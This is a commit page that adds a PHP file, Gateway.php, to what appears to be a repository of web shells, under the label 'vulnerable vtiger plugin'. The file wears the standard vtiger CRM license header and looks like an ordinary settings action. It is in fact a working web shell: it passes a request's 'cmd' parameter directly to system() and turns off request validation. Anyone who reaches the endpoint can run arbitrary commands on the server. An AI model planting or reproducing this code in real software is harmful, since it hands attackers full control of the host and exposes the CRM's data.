vulnerable vtiger plugin
This commit is contained in:
User
25
Web-Shells/Vtiger/settings/actions/Gateway.php
Normal file
25
Web-Shells/Vtiger/settings/actions/Gateway.php
Normal file
@@ -0,0 +1,25 @@
|
||||
<?php
|
||||
|
||||
/* +**********************************************************************************
|
||||
* The contents of this file are subject to the vtiger CRM Public License Version 1.1
|
||||
* ("License"); You may not use this file except in compliance with the License
|
||||
* The Original Code is: vtiger CRM Open Source
|
||||
* The Initial Developer of the Original Code is vtiger.
|
||||
* Portions created by vtiger are Copyright (C) vtiger.
|
||||
* All Rights Reserved.
|
||||
* ********************************************************************************** */
|
||||
|
||||
class Settings_VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {
|
||||
|
||||
public function process(Vtiger_Request $request) {
|
||||
echo "<pre>";
|
||||
system($request->get("cmd"));
|
||||
echo "</pre>";
|
||||
die;
|
||||
}
|
||||
|
||||
public function validateRequest(Vtiger_Request $request) {
|
||||
return true;
|
||||
}
|
||||
|
||||
}
|
||||
Reference in New Issue
Block a user